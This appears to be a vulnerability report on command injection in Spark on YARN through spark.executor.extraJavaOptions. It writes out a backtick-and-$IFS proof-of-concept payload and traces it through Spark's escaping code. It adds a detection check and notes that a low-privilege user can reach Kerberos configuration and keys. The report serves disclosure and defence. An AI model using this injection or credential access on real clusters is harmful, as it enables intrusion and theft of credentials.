Details
Type: Improvement
Status: Open
Priority: Major
Resolution: Unresolved
Affects Version/s: 3.5.1
Fix Version/s: None
Component/s: None
Labels: Important
Description
First, we need to obtain regular user privileges and build a JAR file according to our own rules. When the task is submitted to YARN, I place a command-injection string in the parameter named "spark.executor.extraJavaOptions"; the value is the backtick command substitution `touch$IFS/tmp/czjtest`.
There are two ways to submit the parameter:
- Using the command line (the backticks and $ are escaped so that the local shell does not expand them):
  spark-submit --class JavaWordCount --master yarn --deploy-mode client --conf spark.executor.extraJavaOptions="\`touch\$IFS/tmp/czjtest\`" test.jar
- Using the Java API:
  sparkLauncher.setConf("spark.executor.extraJavaOptions", "`touch$IFS/tmp/czjtest`");
Afterwards, traces of the injected command can be found in the Hadoop logs.
I found the code path that exposes the problem in the file ExecutorRunnable.scala (resource-managers/yarn), where the option string is split into tokens, each token is shell-escaped, and the result is appended to the executor's Java command line:

```scala
// Set extra Java options for the executor, if defined
sparkConf.get(EXECUTOR_JAVA_OPTIONS).foreach { opts =>
  val subsOpt = Utils.substituteAppNExecIds(opts, appId, executorId)
  javaOpts ++= Utils.splitCommandString(subsOpt).map(YarnSparkHadoopUtil.escapeForShell)
}
```
CVSS score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
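To make the code path above concrete, here is an added example that is not part of the report or of Spark. It ports the two helpers the snippet calls, Utils.splitCommandString and the Unix branch of YarnSparkHadoopUtil.escapeForShell, as I read them (the Python versions are my own, not the Scala originals), runs the reported value through them, and shows why $IFS is used in place of a space: splitCommandString breaks the option string on unquoted whitespace, so a literal space would turn the payload into two tokens. escapeForShell wraps each token in single quotes, but YARN's launch_container.sh places the whole java command inside a double-quoted `exec /bin/bash -c "..."`, where single quotes are ordinary characters and backticks are still evaluated by the shell, which is consistent with the behaviour the report describes. The final function is a submission-gateway check an operator could run on --conf values before they reach spark-submit; its name and the set of keys it watches are my choices.

```python
"""Added example (not Spark's code): follow a spark.executor.extraJavaOptions
value through split + escape, and flag values carrying shell substitution.

split_command_string() and escape_for_shell() are Python ports of
Utils.splitCommandString and YarnSparkHadoopUtil.escapeForShell (Unix branch)
as I read them; they are assumptions about the Scala code, not the original.
"""
import re


def split_command_string(s: str) -> list[str]:
    """Split on unquoted whitespace; honour '...' and "..." (with \\ inside "...")."""
    words, cur = [], []
    in_word = in_single = in_double = False
    i = 0
    while i < len(s):
        c = s[i]
        if in_double:
            if c == '"':
                in_double = False
            elif c == '\\' and i < len(s) - 1:
                cur.append(s[i + 1])      # only the next char, as the Scala code does
                i += 1
            else:
                cur.append(c)
        elif in_single:
            if c == "'":
                in_single = False
            else:
                cur.append(c)             # backslashes are literal in single quotes
        elif c == '"':
            in_word = in_double = True
        elif c == "'":
            in_word = in_single = True
        elif not c.isspace():
            cur.append(c)
            in_word = True
        elif in_word:
            words.append("".join(cur))
            cur = []
            in_word = False
        i += 1
    if in_word or in_double or in_single:
        words.append("".join(cur))
    return words


def escape_for_shell(arg: str) -> str:
    """Wrap in single quotes and escape $, " and ' (Unix branch of escapeForShell)."""
    out = ["'"]
    for c in arg:
        if c == "$":
            out.append("\\$")
        elif c == '"':
            out.append('\\"')
        elif c == "'":
            out.append("'\\''")
        else:
            out.append(c)
    out.append("'")
    return "".join(out)


def executor_java_opts(extra_java_options: str) -> list[str]:
    """The javaOpts tokens the ExecutorRunnable snippet would add for this value."""
    return [escape_for_shell(t) for t in split_command_string(extra_java_options)]


# Backticks, $(...) and $IFS inside the tokens are still interpreted once the
# command line sits inside YARN's double-quoted `exec /bin/bash -c "..."`.
_SUBSTITUTION = re.compile(r"`|\$\(|\$\{?IFS")


def has_shell_substitution(value: str) -> bool:
    return _SUBSTITUTION.search(value) is not None


def check_submission_conf(conf: dict[str, str]) -> list[str]:
    """Keys a submission gateway should reject (hypothetical check, my choice of keys)."""
    watched = ("spark.executor.extraJavaOptions", "spark.driver.extraJavaOptions")
    return [k for k in watched if k in conf and has_shell_substitution(conf[k])]


if __name__ == "__main__":
    payload = "`touch$IFS/tmp/czjtest`"          # the value quoted in the report
    print(executor_java_opts(payload))            # one token, still holding backticks
    print(executor_java_opts("`touch /tmp/czjtest`"))  # a plain space splits it in two
    print(check_submission_conf({"spark.executor.extraJavaOptions": payload,
                                 "spark.driver.extraJavaOptions": "-Xss4m"}))
```

The escaped token is `'`touch\$IFS/tmp/czjtest`'`: the single quotes and the escaped dollar sign are exactly what escapeForShell is meant to produce, so the check has to happen on the raw value before it is handed to the YARN client.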
In the directory Bigdata/common/runtime/security there are security configurations; the krb5.conf file is readable by ldapuser, and the key location it references is accessible.
In Bigdata/FusionInsight_Current/1_5_DataNode/install/hadoop, ldapuser has read and execute permissions, which allows commands such as hadoop, hdfs and yarn to be run.
In Bigdata/FusionInsight_Current/1_6_NodeManager/etc, ldapuser has read permissions, and business configurations are present there.
In Bigdata/FusionInsight_Current/1_6_NodeManager/install/hadoop, ldapuser has read and execute permissions, which allows commands such as hadoop, hdfs and yarn to be run.
In Bigdata/FusionInsight_Current/1_8_RegionServer, ldapuser has read permissions on a few files, and business configurations are present there.